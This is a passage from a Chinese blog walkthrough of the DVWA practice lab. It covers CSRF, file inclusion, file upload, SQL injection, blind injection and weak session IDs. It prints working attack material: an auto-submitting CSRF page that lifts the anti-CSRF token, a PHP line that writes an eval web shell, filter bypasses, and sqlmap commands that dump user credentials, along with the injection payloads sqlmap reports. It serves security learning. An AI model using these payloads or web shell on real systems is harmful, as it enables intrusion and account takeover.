document.getElementById(&quot;transfer&quot;).submit();   &#125;</span><br><span class="line">&lt;/script&gt;</span><br><span class="line">&lt;iframe src=&quot;http://192.168.153.130/dvwa/vulnerabilities/csrf&quot; id=&quot;hack&quot; border=&quot;0&quot; style=&quot;display:none;&quot;&gt;</span><br><span class="line">&lt;/iframe&gt;</span><br><span class="line"> </span><br><span class="line">&lt;body οnlοad=&quot;attack()&quot;&gt;</span><br><span class="line"> &lt;form method=&quot;GET&quot; id=&quot;transfer&quot; action=&quot;http://192.168.153.130/dvwa/vulnerabilities/csrf&quot;&gt;</span><br><span class="line">    &lt;input type=&quot;hidden&quot; name=&quot;password_new&quot; value=&quot;password&quot;&gt;</span><br><span class="line">    &lt;input type=&quot;hidden&quot; name=&quot;password_conf&quot; value=&quot;password&quot;&gt;</span><br><span class="line">    &lt;input type=&quot;hidden&quot; name=&quot;user_token&quot; value=&quot;&quot;&gt;</span><br><span class="line">    &lt;input type=&quot;hidden&quot; name=&quot;Change&quot; value=&quot;Change&quot;&gt;</span><br><span class="line"> &lt;/form&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<ol>
<li>在<code>&lt;script&gt;</code>标签中定义了一个JavaScript函数<code>attack()</code>，该函数的作用是：<ul>
<li>从隐藏的<code>&lt;iframe&gt;</code>中获取名为<code>user_token</code>的元素的值（这通常是用来防止CSRF攻击的一种令牌）。</li>
<li>将获取到的<code>user_token</code>值设置到当前页面表单中名为<code>user_token</code>的隐藏输入字段。</li>
<li>提交表单<code>transfer</code>。</li>
</ul>
</li>
</ol>
<h3 id="方法二（与XSS结合）"><a href="#方法二（与XSS结合）" class="headerlink" title="方法二（与XSS结合）"></a>方法二（与XSS结合）</h3><h3 id="方法三（bp自动识别token）"><a href="#方法三（bp自动识别token）" class="headerlink" title="方法三（bp自动识别token）"></a>方法三（bp自动识别token）</h3><h1 id="File-Inclusion（文件包含）"><a href="#File-Inclusion（文件包含）" class="headerlink" title="File Inclusion（文件包含）"></a>File Inclusion（文件包含）</h1><h2 id="介绍"><a href="#介绍" class="headerlink" title="介绍"></a>介绍</h2><p>随着网站业务的需求，程序开发人员一般希望代码更灵活，所以将被包含的文件设置为变量，用来进行动态调用，但是正是这种灵活性通过动态变 量的方式引入需要包含的文件时，用户对这个变量可控而且服务端又没有做合理的校验或者校验被绕过就造成了文件包含漏洞。</p>
<p>require()：可以包含文件，如果包含错了，直接报错并退出程序的执行<br>include()：在包含的过程中如果出现错误，会抛出一个警告，程序继续正常运行<br>require_once()：与require类似，区别在于当重复调用同一文件时，程序只调用一次<br>include_once()：与include类似，区别在于当重复调用同一文件时，程序只调用一次</p>
<h2 id="low-3"><a href="#low-3" class="headerlink" title="low"></a>low</h2><p> <strong>法一</strong></p>
<p>我们发现这里是利用url中page的值来传输想要访问的文件的名的，然后在index.php中进行包含。</p>
<p>我们需要利用File upload的部分来上传一个能生成木马的php脚本，然后在我们这个页面访问它，当它被包含的时候会被当做php脚本执行便能生成含有一句话木马的脚本，我们便能利用蚁剑进行连接。</p>
<p><strong>法二</strong></p>
<p>我们还能利用远程文件包含，访问外部站点中的生成一句话木马的文件，这样我们便不需要上传文件。例如</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?</span>PHP <span class="title function_ invoke__">fputs</span>(<span class="title function_ invoke__">fopen</span>(<span class="string">&#x27;shell.php&#x27;</span>,<span class="string">&#x27;w&#x27;</span>),<span class="string">&#x27;&lt;?php eval($_POST[pass])?&gt;&#x27;</span>);<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h2 id="medium-3"><a href="#medium-3" class="headerlink" title="medium"></a>medium</h2><p>查看源码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">// The page we wish to display</span><br><span class="line">$file = $_GET[ &#x27;page&#x27; ];</span><br><span class="line"></span><br><span class="line">// Input validation</span><br><span class="line">$file = str_replace( array( &quot;http://&quot;, &quot;https://&quot; ), &quot;&quot;, $file );</span><br><span class="line">$file = str_replace( array( &quot;../&quot;, &quot;..\\&quot; ), &quot;&quot;, $file );</span><br><span class="line"></span><br><span class="line">?&gt; </span><br></pre></td></tr></table></figure>

<p>这里利用str_replace来过滤我们的输入。</p>
<p>那么我们在进行本地文件包含和远程文件包含的时候只要注意利用双写来绕过str_replace函数。</p>
<h2 id="high-3"><a href="#high-3" class="headerlink" title="high"></a>high</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">// The page we wish to display</span><br><span class="line">$file = $_GET[ &#x27;page&#x27; ];</span><br><span class="line"></span><br><span class="line">// Input validation</span><br><span class="line">if( !fnmatch( &quot;file*&quot;, $file ) &amp;&amp; $file != &quot;include.php&quot; ) &#123;</span><br><span class="line">    // This isn&#x27;t the page we want!</span><br><span class="line">    echo &quot;ERROR: File not found!&quot;;</span><br><span class="line">    exit;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">?&gt; </span><br></pre></td></tr></table></figure>

<p>这里要求我们输入的字符串必须以<code>file</code>开头，那么我们可以使用伪协议file:&#x2F;&#x2F;&#x2F;进行绕过。</p>
<h1 id="file-upload"><a href="#file-upload" class="headerlink" title="file upload"></a>file upload</h1><h2 id="low-4"><a href="#low-4" class="headerlink" title="low"></a>low</h2><p>查看源码发现并没有对上传的文件进行任何过滤，我们直接上传一个一句话木马再用蚁剑进行连接。</p>
<h2 id="medium-4"><a href="#medium-4" class="headerlink" title="medium"></a>medium</h2><p>这个属于检测上传文件的mime类型，我们直接抓包修改就行了。</p>
<h2 id="high-4"><a href="#high-4" class="headerlink" title="high"></a>high</h2><p>这里利用getimagesize（）函数检测文件，那么我们只需要把一句话木马和正常文件拼接起来，便能上传成功.我们再利用文件包含漏洞就能成功利用蚁剑连接。由于有白名单限制，所以利用.user.ini或.htaccess文件的方法貌似不行。</p>
<h1 id="sql注入-1"><a href="#sql注入-1" class="headerlink" title="sql注入"></a>sql注入</h1><p>由于之前打过靶场，这里就利用sqlmap来进行注入。</p>
<p><strong>使用sqlmap进行SQL注入的基本步骤</strong><br>查看sqlmap相关参数，命令格式为：sqlmap -h<br>找到一个可利用的网址，判断网站数据库类型，命令格式为：sqlmap -u<br>确定数据库类型为mysql后，查看存在的数据库，命令格式为：sqlmap -u 目标网址–dbs<br>查看数据库中存在的表，命令格式为：sqlmap -u 目标网址–tables -D 数据库名<br>获取表中的字段，命令格式为：sqlmap -u 目标网址– columns -T 表名 -D 数据库名<br>猜解出字段，查看表里的存储内容，命令格式为：sqlmap -u 目标网址– dump -C 字段名称 -T 表名 -D 数据库名</p>
<h2 id="low-5"><a href="#low-5" class="headerlink" title="low"></a>low</h2><p>由于dvwa需要登录，所以我们需要先抓包获取cookie。</p>
<p><code>security=low; PHPSESSID=e5bk9sguspes5davp15hiknij</code></p>
<p>使用<code>sqlmap.py -u &quot;http://dvwa:8898/vulnerabilities/sqli/?id=1&amp;Submit=Submit#&quot; --cookie=&quot;security=low; PHPSESSID=e5bk9sguspes5davp15hiknij&quot; --batch --dbs</code></p>
<p>获取数据库</p>
<p><code>sqlmap.py -u &quot;http://dvwa:8898/vulnerabilities/sqli/?id=1&amp;Submit=Submit#&quot; --cookie=&quot;security=low; PHPSESSID=e5bk9sguspes5davp15hiknij&quot; --batch --current-db</code></p>
<p>获取当前数据库</p>
<p><code>sqlmap.py -u &quot;http://dvwa:8898/vulnerabilities/sqli/?id=1&amp;Submit=Submit#&quot; --cookie=&quot;security=low; PHPSESSID=e5bk9sguspes5davp15hiknij&quot; --batch -D dvwa --tables</code></p>
<p>查表</p>
<p><code>sqlmap.py -u &quot;http://dvwa:8898/vulnerabilities/sqli/?id=1&amp;Submit=Submit#&quot; --cookie=&quot;security=low; PHPSESSID=e5bk9sguspes5davp15hiknij&quot; --batch -D dvwa -T users --columns</code></p>
<p>查数据列</p>
<p><code>sqlmap.py -u &quot;http://dvwa:8898/vulnerabilities/sqli/?id=1&amp;Submit=Submit#&quot; --cookie=&quot;security=low; PHPSESSID=e5bk9sguspes5davp15hiknij&quot; --batch -D dvwa -T user -C &quot;user,password&quot; --dump</code></p>
<p>查用户名与密码。</p>
<h2 id="medium-5"><a href="#medium-5" class="headerlink" title="medium"></a>medium</h2><p>改成了POST方法，我们只需要使用–data传输参数就行。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python sqlmap.py -u &quot;http://dvwa:8898/vulnerabilities/sqli/#&quot; -data &quot;id=1&amp;Submit=Submit&quot; --cookie=&quot;PHPSESSID=b03cjnsi079pmeu9sse5up5kgf; security=medium&quot; --batch -dbs</span><br></pre></td></tr></table></figure>

<p>可以正常显示</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">available databases [2]:</span><br><span class="line">[*] dvwa</span><br><span class="line">[*] information_schema</span><br></pre></td></tr></table></figure>

<p>接下来就和之前的步骤一样</p>
<h2 id="high-5"><a href="#high-5" class="headerlink" title="high"></a>high</h2><p><strong>手动注入</strong></p>
<p>看了下好像是在查询的时候是在另一个页面进行的，但是数据回显还是在原来的页面，由于源代码中有</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$result = mysqli_query($GLOBALS[&quot;___mysqli_ston&quot;], $query ) or die( &#x27;&lt;pre&gt;Something went wrong.&lt;/pre&gt;&#x27; ); </span><br></pre></td></tr></table></figure>

<p>所以这里不能用报错注入，我们直接用正常的联合查询就行了。</p>
<p><strong>sqlmap</strong></p>
<p>这里我们就要用到–second-u参数这个参数的作用：</p>
<p><strong>当测试存储型 SQL 注入时，攻击者可能需要先向一个 URL 提交恶意数据（例如通过表单），然后在另一个 URL（如显示数据的页面）触发漏洞。<code>--second-u</code> 用于指定触发注入的第二个 URL，使 sqlmap 能够检测这类延迟触发的漏洞。</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python sqlmap.py -u &quot;dvwa:8898/vulnerabilities/sqli/session-input.php#&quot; --second-u &quot;http://dvwa:8898/vulnerabilities/sqli/&quot; -data &quot;id=1&amp;Submit=Submit&quot; --cookie=&quot;PHPSESSID=b03cjnsi079pmeu9sse5up5kgf; security=high&quot; --batch -dbs</span><br></pre></td></tr></table></figure>

<p>可以正确查询到数据库，接下来和之前的一样。</p>
<h1 id="sql盲注"><a href="#sql盲注" class="headerlink" title="sql盲注"></a>sql盲注</h1><p>我这里直接试验high难度的，发现和普通sql的high难度差不多，不过是盲注，直接构造</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python sqlmap.py -u &quot;dvwa:8898/vulnerabilities/sqli_blind/cookie-input.php#&quot; --second-u &quot;http://dvwa:8898/vulnerabilities/sqli_blind/&quot; -data &quot;id=1&amp;Submit=Submit&quot; --cookie=&quot;id=1; PHPSESSID=b03cjnsi079pmeu9sse5up5kgf; security=high&quot; --batch -dbs</span><br></pre></td></tr></table></figure>

<p>发现</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">---</span><br><span class="line">Parameter: id (POST)</span><br><span class="line">    Type: boolean-based blind</span><br><span class="line">    Title: AND boolean-based blind - WHERE or HAVING clause</span><br><span class="line">    Payload: id=1&#x27; AND 4605=4605 AND &#x27;qJMJ&#x27;=&#x27;qJMJ&amp;Submit=Submit</span><br><span class="line"></span><br><span class="line">    Type: time-based blind</span><br><span class="line">    Title: MySQL &gt;= 5.0.12 OR time-based blind (SLEEP - comment)</span><br><span class="line">    Payload: id=1&#x27; OR SLEEP(5)#&amp;Submit=Submit</span><br><span class="line">---</span><br><span class="line">available databases [2]:</span><br><span class="line">[*] dvwa</span><br><span class="line">[*] information_schema</span><br></pre></td></tr></table></figure>

<p>存在两种注入方式。</p>
<h1 id="Weak-Session-IDs"><a href="#Weak-Session-IDs" class="headerlink" title="Weak Session IDs"></a>Weak Session IDs</h1><h2 id="low-6"><a href="#low-6" class="headerlink" title="low"></a>low</h2><p>由标题可知这关是在session id上下文章,查看源码发现我们每点一次按钮，cookie中的dvwasession的值便会增加1，那么我们知道了生成规律便可以伪造dvwasession进行登录操作。</p>
<h2 id="medium-6"><a href="#medium-6" class="headerlink" title="medium"></a>medium</h2><p>查看源码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">$html = &quot;&quot;;</span><br><span class="line"></span><br><span class="line">if ($_SERVER[&#x27;REQUEST_METHOD&#x27;] == &quot;POST&quot;) &#123;</span><br><span class="line">    $cookie_value = time();</span><br><span class="line">    setcookie(&quot;dvwaSession&quot;, $cookie_value);</span><br><span class="line">&#125;</span><br><span class="line">?&gt; </span><br></pre></td></tr></table></figure>

<p>是利用时间戳生成id的，那么我们便可以定时攻击。</p>
<h2 id="high-6"><a href="#high-6" class="headerlink" title="high"></a>high</h2><p>这里和第一关差不多，不过把dvwasession的值md5加密了</p>
</div></section><div id="reward-container"><span class="hty-icon-button button-glow" id="reward-button" title="Donate" onclick="var qr = document.getElementById(&quot;qr&quot;); qr.style.display = (qr.style.display === &quot;none&quot;) ? &quot;block&quot; : &quot;none&quot;;"><span class="icon iconify" data-icon="ri:hand-coin-line"></span></span><div id="reward-comment">I'm so cute. Please give me money.</div></div><ul class="post-copyright"><li class="post-copyright-author"><strong>Post author: </strong>John Doe</li><li class="post-copyright-link"><strong>Post link: </strong><a href="http://example.com/2025/02/24/DVWA/" title="DVWA">http://example.com/2025/02/24/DVWA/</a></li><li class="post-copyright-license"><strong>Copyright Notice: </strong>All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank" rel="noopener" title="CC BY-NC-SA 4.0 "><span class="icon iconify" data-icon="ri:creative-commons-line"></span><span class="icon iconify" data-icon="ri:creative-commons-by-line"></span><span class="icon iconify" data-icon="ri:creative-commons-nc-line"></span><span class="icon iconify" data-icon="ri:creative-commons-sa-line"></span></a> unless otherwise stated.</li></ul></article><div class="post-nav"><div class="post-nav-item"><a class="post-nav-prev" href="/2025/02/28/sqlmap/" rel="prev" title="sqlmap"><span class="icon iconify" data-icon="ri:arrow-left-s-line"></span><span class="post-nav-text">sqlmap</span></a></div><div class="post-nav-item"><a class="post-nav-next" href="/2025/02/22/upload11-21/" rel="next" title="upload11-21"><span class="post-nav-text">upload11-21</span><span class="icon iconify" data-icon="ri:arrow-right-s-line"></span></a></div></div></div><div class="hty-card" id="comment"></div></main><footer class="sidebar-translate" id="footer"><div class="copyright"><span>&copy; 2019 – 2025 </span><span class="with-love" id="animate"><span class="icon iconify" data-icon="ri:cloud-line"></span></span><span class="author"> John Doe</span></div><div class="powered"><span>Powered by <a href="https://hexo.io" target="_blank" rel="noopener">Hexo</a> v7.3.0</span><span class="footer-separator">|</span><span>Theme - <a rel="noopener" href="https://github.com/YunYouJun/hexo-theme-yun" target="_blank"><span>Yun</span></a> v1.10.11</span></div></footer></div><a class="hty-icon-button" id="back-to-top" aria-label="back-to-top" href="#"><span class="icon iconify" data-icon="ri:arrow-up-s-line"></span><svg class="progress-circle-container" viewBox="0 0 100 100"><circle class="progress-circle" id="progressCircle" cx="50" cy="50" r="48" fill="none" stroke="#0078E7" stroke-width="2" stroke-linecap="round"></circle></svg></a></body></html>